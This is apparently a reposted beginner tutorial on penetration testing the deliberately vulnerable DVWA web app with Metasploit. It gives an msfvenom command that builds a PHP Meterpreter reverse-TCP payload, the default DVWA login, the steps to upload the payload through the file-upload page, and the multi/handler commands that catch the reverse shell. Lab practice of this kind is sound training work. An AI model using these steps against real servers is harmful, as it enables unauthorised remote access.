Web Server Penetration Testing with DVWA and Metasploit (Beginner Guide)

Datetime:2016-08-23 01:09:01         Topic: Penetration Testing          Share        Original >>
Here to See The Original Article!!!

Open your kali linux terminal and type

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw

It will generate a raw code of php file

Now copy the generated code in the text file and save it on your desktop with .php extension

Now open the DVWA Webapp in your server and login with following credentials:

Username– admin

Password– password

Now scroll to the File Upload section in left pane and upload the above created php file

When you will finish uploading your php file, it will show you the path

Now open your uploaded file in browser

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost

set lport 4444


Now you can access the victim’s server


Put your ads here, just $200 per month.